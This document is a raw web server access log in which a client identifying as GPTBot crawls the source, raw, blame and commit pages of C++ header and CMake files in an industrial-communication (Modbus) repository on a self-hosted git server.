"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11315] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11168] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12894] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11521] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11520] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10432] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12509] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10084] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12897] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11820] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12898] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13638] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12508] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10523] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12895] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10246] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11520] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11822] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11431] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12897] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10245] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13639] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" 